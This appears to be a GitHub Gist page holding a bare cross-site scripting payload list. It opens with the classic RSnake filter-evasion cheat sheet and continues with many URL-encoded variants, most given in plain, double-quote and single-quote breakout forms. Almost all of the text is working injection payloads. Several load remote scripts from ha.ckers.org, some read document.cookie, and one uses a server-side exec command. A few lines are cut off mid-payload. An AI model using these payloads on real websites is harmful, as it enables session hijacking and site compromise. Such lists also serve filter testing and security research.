-
-
Save Rajchowdhury420/ecc6d4a41e32b81b727fa87074253403 to your computer and use it in GitHub Desktop.
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> | |
| <IMG SRC=JaVaScRiPt:alert('XSS')> | |
| <IMG SRC=javascript:alert("XSS")> | |
| <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
| <a onmouseover="alert(document.cookie)">xxs link</a> | |
| <a onmouseover=alert(document.cookie)>xxs link</a> | |
| <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
| <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
| <IMG SRC=# onmouseover="alert('xxs')"> | |
| <IMG SRC= onmouseover="alert('xxs')"> | |
| <IMG onmouseover="alert('xxs')"> | |
| <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> | |
| <IMG SRC=javascript:alert( | |
| 'XSS')> | |
| <IMG SRC=javascript:a& | |
| #0000108ert('XSS')> | |
| <IMG SRC=javascript:alert('XSS')> | |
| <IMG SRC="jav ascript:alert('XSS');"> | |
| <IMG SRC="jav	ascript:alert('XSS');"> | |
| <IMG SRC="jav
ascript:alert('XSS');"> | |
| <IMG SRC="jav
ascript:alert('XSS');"> | |
| <IMG SRC="  javascript:alert('XSS');"> | |
| <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
| <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <<SCRIPT>alert("XSS");//<</SCRIPT> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | |
| <SCRIPT SRC=//ha.ckers.org/.j> | |
| <IMG SRC="javascript:alert('XSS')" | |
| <iframe src=http://ha.ckers.org/scriptlet.html < | |
| \";alert('XSS');// | |
| </script><script>alert('XSS');</script> | |
| </TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
| <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
| <BODY BACKGROUND="javascript:alert('XSS')"> | |
| <IMG DYNSRC="javascript:alert('XSS')"> | |
| <IMG LOWSRC="javascript:alert('XSS')"> | |
| <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |
| <IMG SRC='vbscript:msgbox("XSS")'> | |
| <IMG SRC="livescript:[code]"> | |
| <BODY ONLOAD=alert('XSS')> | |
| <BGSOUND SRC="javascript:alert('XSS');"> | |
| <BR SIZE="&{alert('XSS')}"> | |
| <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
| <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
| <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
| <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
| <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
| <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
| <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
| exp/*<A STYLE='no\xss:noxss("*//*"); | |
| xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | |
| <STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
| <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
| <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
| <XSS STYLE="xss:expression(alert('XSS'))"> | |
| <XSS STYLE="behavior: url(xss.htc);"> | |
| ¼script¾alert(¢XSS¢)¼/script¾ | |
| <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
| <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
| <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
| <IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
| <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
| <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
| <TABLE BACKGROUND="javascript:alert('XSS')"> | |
| <TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |
| <DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
| <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
| <DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
| <DIV STYLE="width: expression(alert('XSS'));"> | |
| <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> | |
| <BASE HREF="javascript:alert('XSS');//"> | |
| <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
| <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |
| <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> | |
| <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |
| <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
| <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
| <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
| <A HREF="http://66.102.7.147/">XSS</A> | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" | |
| veris-->group<svg/onload=alert(/XSS/)// | |
| #"><img src=M onerror=alert('XSS');> | |
| element[attribute='<img src=x onerror=alert('XSS');> | |
| [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] | |
| %22;alert%28%27RVRSH3LL_XSS%29// | |
| javascript:alert%281%29; | |
| <w contenteditable id=x onfocus=alert()> | |
| alert;pg("XSS") | |
| <svg/onload=%26%23097lert%26lpar;1337)> | |
| <script>for((i)in(self))eval(i)(1)</script> | |
| <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> | |
| <sCR<script>iPt>alert(1)</SCr</script>IPt> | |
| <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> |
zxcv
'%3E%3Cstyle%3E%3Cimg%20src=%22%3C/style%3E%3Cimg%20src=x%20onerror=javascript:alert(1)//%22%3E
%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty
%22%3E%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty
'%3E%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty
%3Chead%3E%3Cbase%20href=%22javascript://%22%3E%3C/head%3E%3Cbody%3E%3Ca%20href=%22/.%20/,javascript:alert(1)//
%22%3E%3Chead%3E%3Cbase%20href=%22javascript://%22%3E%3C/head%3E%3Cbody%3E%3Ca%20href=%22/.%20/,javascript:alert(1)//
'%3E%3Chead%3E%3Cbase%20href=%22javascript://%22%3E%3C/head%3E%3Cbody%3E%3Ca%20href=%22/.%20/,javascript:alert(1)//
%3CSCRIPT%20FOR=document%20EVENT=onreadystatechange%3Ejavascript:alert(1)%3C/SCRIPT%3E
%22%3E%3CSCRIPT%20FOR=document%20EVENT=onreadystatechange%3Ejavascript:alert(1)%3C/SCRIPT%3E
'%3E%3CSCRIPT%20FOR=document%20EVENT=onreadystatechange%3Ejavascript:alert(1)%3C/SCRIPT%3E
%3Cb%20%3Cscript%3Ealert(1)%3C/script%3E
'%3E%3Cscript%3Ealert(1)%3C/script%3E0
%3Cdiv%20id=%22div1%22%3E%3Cinput%20value=%22%60%60onmouseover=javascript:alert(1)%22%3E%3C/div%3E%20%3Cdiv%20id=%22div2%22%3E%3C/div%3E%3Cscript%3Edocument.getElementById(%22div2%22).innerHTML%20=%20document.getElementById(%22div1%22).innerHTML;%3C/script%3E
%22%3E%3Cdiv%20id=%22div1%22%3E%3Cinput%20value=%22%60%60onmouseover=javascript:alert(1)%22%3E%3C/div%3E%20%3Cdiv%20id=%22div2%22%3E%3C/div%3E%3Cscript%3Edocument.getElementById(%22div2%22).innerHTML%20=%20document.getElementById(%22div1%22).innerHTML;%3C/script%3E
'%3E%3Cdiv%20id=%22div1%22%3E%3Cinput%20value=%22%60%60onmouseover=javascript:alert(1)%22%3E%3C/div%3E%20%3Cdiv%20id=%22div2%22%3E%3C/div%3E%3Cscript%3Edocument.getElementById(%22div2%22).innerHTML%20=%20document.getElementById(%22div1%22).innerHTML;%3C/script%3E
%3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=javascript:alert(1)//'%3E
%22%3E%3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=javascript:alert(1)//'%3E
'%3E%3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=javascript:alert(1)//'%3E
%3Cembed%20src=%22javascript:alert(1)%22%3E
%22%3E%3Cembed%20src=%22javascript:alert(1)%22%3E
'%3E%3Cembed%20src=%22javascript:alert(1)%22%3E
%3Cdiv%20style=width:1px;filter:glow%20onfilterchange=javascript:alert(1)%3Ex
%22%3E%3Cdiv%20style=width:1px;filter:glow%20onfilterchange=javascript:alert(1)%3Ex
'%3E%3Cdiv%20style=width:1px;filter:glow%20onfilterchange=javascript:alert(1)%3Ex
%3C?%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
'%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E%22%3E
%22%3E%3C?%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
'%3E%3C?%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
%3C!%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
%22%3E%3C!%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
'%3E%3C!%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
%3C/%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
%22%3E%3C/%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
'%3E%3C/%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
%3C?%20foo=%22%3E%3Cx%20foo='?%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
'%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E'%3E%22%3E
%22%3E%3C?%20foo=%22%3E%3Cx%20foo='?%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
'%3E%3C?%20foo=%22%3E%3Cx%20foo='?%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
%3C!%20foo=%22[[[Inception]]%22%3E%3Cx%20foo=%22]foo%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
%22%3E%3C!%20foo=%22[[[Inception]]%22%3E%3Cx%20foo=%22]foo%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
'%3E%3C!%20foo=%22[[[Inception]]%22%3E%3Cx%20foo=%22]foo%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
%3Cdiv%20id=d%3E%3Cx%20xmlns=%22%3E%3Ciframe%20onload=javascript:alert(1)%22%3E%3C/div%3E%20%3Cscript%3Ed.innerHTML=d.innerHTML%3C/script%3E
%22%3E%3Cdiv%20id=d%3E%3Cx%20xmlns=%22%3E%3Ciframe%20onload=javascript:alert(1)%22%3E%3C/div%3E%20%3Cscript%3Ed.innerHTML=d.innerHTML%3C/script%3E
'%3E%3Cdiv%20id=d%3E%3Cx%20xmlns=%22%3E%3Ciframe%20onload=javascript:alert(1)%22%3E%3C/div%3E%20%3Cscript%3Ed.innerHTML=d.innerHTML%3C/script%3E
%3Cimg%20/x00src=x%20onerror=%22alert(1)%22%3E
%22%3E%3Cimg%20/x00src=x%20onerror=%22alert(1)%22%3E
'%3E%3Cimg%20/x00src=x%20onerror=%22alert(1)%22%3E
%3Cimg%20/x47src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20/x47src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20/x47src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20/x11src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20/x11src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20/x11src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20/x12src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20/x12src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20/x12src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg/x47src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg/x47src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg/x47src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg/x10src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg/x10src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg/x10src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg/x13src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg/x13src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg/x13src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg/x32src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg/x32src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg/x32src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg/x11src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg/x11src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg/x11src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20/x34src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20/x34src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20/x34src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20/x39src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20/x39src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20/x39src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20/x00src=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20/x00src=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20/x00src=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src/x09=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src/x09=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src/x09=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src/x10=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src/x10=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src/x10=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src/x13=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src/x13=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src/x13=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src/x32=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src/x32=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src/x32=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src/x12=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src/x12=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src/x12=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src/x11=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src/x11=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src/x11=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src/x00=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src/x00=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src/x00=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src/x47=x%20onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src/x47=x%20onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src/x47=x%20onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src=x/x09onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x/x09onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x/x09onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src=x/x10onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x/x10onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x/x10onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src=x/x11onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x/x11onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x/x11onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src=x/x12onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x/x12onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x/x12onerror=%22javascript:alert(1)%22%3E
%3Cimg%20src=x/x13onerror=%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x/x13onerror=%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x/x13onerror=%22javascript:alert(1)%22%3E
%3Cimg[a][b][c]src[d]=x[e]onerror=[f]%22alert(1)%22%3E
%22%3E%3Cimg[a][b][c]src[d]=x[e]onerror=[f]%22alert(1)%22%3E
'%3E%3Cimg[a][b][c]src[d]=x[e]onerror=[f]%22alert(1)%22%3E
%3Cimg%20src=x%20onerror=/x09%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x%20onerror=/x09%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x%20onerror=/x09%22javascript:alert(1)%22%3E
%3Cimg%20src=x%20onerror=/x10%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x%20onerror=/x10%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x%20onerror=/x10%22javascript:alert(1)%22%3E
%3Cimg%20src=x%20onerror=/x11%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x%20onerror=/x11%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x%20onerror=/x11%22javascript:alert(1)%22%3E
%3Cimg%20src=x%20onerror=/x12%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x%20onerror=/x12%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x%20onerror=/x12%22javascript:alert(1)%22%3E
%3Cimg%20src=x%20onerror=/x32%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x%20onerror=/x32%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x%20onerror=/x32%22javascript:alert(1)%22%3E
%3Cimg%20src=x%20onerror=/x00%22javascript:alert(1)%22%3E
%22%3E%3Cimg%20src=x%20onerror=/x00%22javascript:alert(1)%22%3E
'%3E%3Cimg%20src=x%20onerror=/x00%22javascript:alert(1)%22%3E
%3Ca%20href=java&
%22%3E%3Ca%20href=java&
'%3E%3Ca%20href=java&
%3Cimg%20src=%22x%60%20%60%3Cscript%3Ejavascript:alert(1)%3C/script%3E
'%3E%3Ctitle%20onpropertychange=javascript:alert(1)%3E%3C/title%3E%3Ctitle%20title=%3E
%3C!--[if]%3E%3Cscript%3Ejavascript:alert(1)%3C/script%20--%3E
%22%3E%3C!--[if]%3E%3Cscript%3Ejavascript:alert(1)%3C/script%20--%3E
'%3E%3C!--[if]%3E%3Cscript%3Ejavascript:alert(1)%3C/script%20--%3E
%3C!--[if%3Cimg%20src=x%20onerror=javascript:alert(1)//]%3E%20--%3E
%22%3E%3C!--[if%3Cimg%20src=x%20onerror=javascript:alert(1)//]%3E%20--%3E
'%3E%3C!--[if%3Cimg%20src=x%20onerror=javascript:alert(1)//]%3E%20--%3E
%3Cobject%20id=%22x%22%20classid=%22clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598%22%3E%3C/object%3E%20%3Cobject%20classid=%22clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B%22%20onqt_error=%22javascript:alert(1)%22%20style=%22behavior:url(
%22%3E%3Cobject%20id=%22x%22%20classid=%22clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598%22%3E%3C/object%3E%20%3Cobject%20classid=%22clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B%22%20onqt_error=%22javascript:alert(1)%22%20style=%22behavior:url(
'%3E%3Cobject%20id=%22x%22%20classid=%22clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598%22%3E%3C/object%3E%20%3Cobject%20classid=%22clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B%22%20onqt_error=%22javascript:alert(1)%22%20style=%22behavior:url(
%3Ca%20style=%22-o-link:'javascript:javascript:alert(1)';-o-link-source:current%22%3EX
%22%3E%3Ca%20style=%22-o-link:'javascript:javascript:alert(1)';-o-link-source:current%22%3EX
'%3E%3Ca%20style=%22-o-link:'javascript:javascript:alert(1)';-o-link-source:current%22%3EX
%3Cstyle%3Ep[foo=bar%7B%7D*%7B-o-link:'javascript:javascript:alert(1)'%7D%7B%7D*%7B-o-link-source:current%7D]%7Bcolor:red%7D;%3C/style%3E
%22%3E%3Cstyle%3Ep[foo=bar%7B%7D*%7B-o-link:'javascript:javascript:alert(1)'%7D%7B%7D*%7B-o-link-source:current%7D]%7Bcolor:red%7D;%3C/style%3E
'%3E%3Cstyle%3Ep[foo=bar%7B%7D*%7B-o-link:'javascript:javascript:alert(1)'%7D%7B%7D*%7B-o-link-source:current%7D]%7Bcolor:red%7D;%3C/style%3E
%3Clink%20rel=stylesheet%20href=data:,%7bx:expression(javascript:alert(1))%7d
%22%3E%3Clink%20rel=stylesheet%20href=data:,%7bx:expression(javascript:alert(1))%7d
'%3E%3Clink%20rel=stylesheet%20href=data:,%7bx:expression(javascript:alert(1))%7d
%3Cstyle%3E@import%20%22data:,%7bx:expression(javascript:alert(1))%7D%22;%3C/style%3E
%22%3E%3Cstyle%3E@import%20%22data:,%7bx:expression(javascript:alert(1))%7D%22;%3C/style%3E
'%3E%3Cstyle%3E@import%20%22data:,%7bx:expression(javascript:alert(1))%7D%22;%3C/style%3E
%3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22javascript:alert(1);%22%3EX%3C/a%3E%3C/a%3E%3
%22%3E%3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22javascript:alert(1);%22%3EX%3C/a%3E%3C/a%3E%3
'%3E%3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22javascript:alert(1);%22%3EX%3C/a%3E%3C/a%3E%3
%3Cdiv%20style=%22font-family:'foo&
%22%3E%3Cdiv%20style=%22font-family:'foo&
'%3E%3Cdiv%20style=%22font-family:'foo&
%3C//%20style=x:expression/28javascript:alert(1)/29%3E
%22%3E%3C//%20style=x:expression/28javascript:alert(1)/29%3E
'%3E%3C//%20style=x:expression/28javascript:alert(1)/29%3E
%3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(javascript:alert(1))%7D%3C/style%3E
%22%3E%3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(javascript:alert(1))%7D%3C/style%3E
'%3E%3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(javascript:alert(1))%7D%3C/style%3E
%3Cdiv%20style=%22list-style:url(http://foo.f)/20url(javascript:javascript:alert(1));%22%3EX
%22%3E%3Cdiv%20style=%22list-style:url(http://foo.f)/20url(javascript:javascript:alert(1));%22%3EX
'%3E%3Cdiv%20style=%22list-style:url(http://foo.f)/20url(javascript:javascript:alert(1));%22%3EX
%3Cdiv%20id=d%3E%3Cdiv%20style=%22font-family:'sans/27/3B%20color/3Ared/3B'%22%3EX%3C/div%3E%3C/div%3E%20%3Cscript%3Ewith(document.getElementById(%22d%22))innerHTML=innerHTML%3C/script%3E
%22%3E%3Cdiv%20id=d%3E%3Cdiv%20style=%22font-family:'sans/27/3B%20color/3Ared/3B'%22%3EX%3C/div%3E%3C/div%3E%20%3Cscript%3Ewith(document.getElementById(%22d%22))innerHTML=innerHTML%3C/script%3E
'%3E%3Cdiv%20id=d%3E%3Cdiv%20style=%22font-family:'sans/27/3B%20color/3Ared/3B'%22%3EX%3C/div%3E%3C/div%3E%20%3Cscript%3Ewith(document.getElementById(%22d%22))innerHTML=innerHTML%3C/script%3E
%3Cdiv%20id=%22x%22%3EX%3C/div%3E%20%3Cstyle%3E%20%20
%22%3E%3Cdiv%20id=%22x%22%3EX%3C/div%3E%20%3Cstyle%3E%20%20
'%3E%3Cdiv%20id=%22x%22%3EX%3C/div%3E%20%3Cstyle%3E%20%20
%3Cx%20style=%22background:url('x&
%22%3E%3Cx%20style=%22background:url('x&
'%3E%3Cx%20style=%22background:url('x&
%3Cscript%3E(%7Bset//$($)%7B_//setter=$,=javascript:alert(1)%7D%7D).$=eval%3C/script%3E
%22%3E%3Cscript%3E(%7Bset/**/$($)%7B//setter=$,_=javascript:alert(1)%7D%7D).$=eval%3C/script%3E
'%3E%3Cscript%3E(%7Bset//$($)%7B_//setter=$,=javascript:alert(1)%7D%7D).$=eval%3C/script%3E
%3Cscript%3EReferenceError.prototype.defineGetter('name',%20function()%7Bjavascript:alert(1)%7D),x%3C/script%3E
%22%3E%3Cscript%3EReferenceError.prototype.defineGetter('name',%20function()%7Bjavascript:alert(1)%7D),x%3C/script%3E
'%3E%3Cscript%3EReferenceError.prototype.defineGetter('name',%20function()%7Bjavascript:alert(1)%7D),x%3C/script%3E
%3Cscript%3EObject.noSuchMethod%20=%20Function,[%7B%7D][0].constructor.('javascript:alert(1)')()%3C/script%3E
%22%3E%3Cscript%3EObject.noSuchMethod%20=%20Function,[%7B%7D][0].constructor.('javascript:alert(1)')()%3C/script%3E
'%3E%3Cscript%3EObject.noSuchMethod%20=%20Function,[%7B%7D][0].constructor.('javascript:alert(1)')()%3C/script%3E
%3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
%22%3E%3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
'%3E%3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
%3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&%3Cscript&S1&TS&1%3Ealert&A7&(1)&R&UA;&&%3C&A9&11/script&X&%3E
%22%3E%3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&%3Cscript&S1&TS&1%3Ealert&A7&(1)&R&UA;&&%3C&A9&11/script&X&%3E
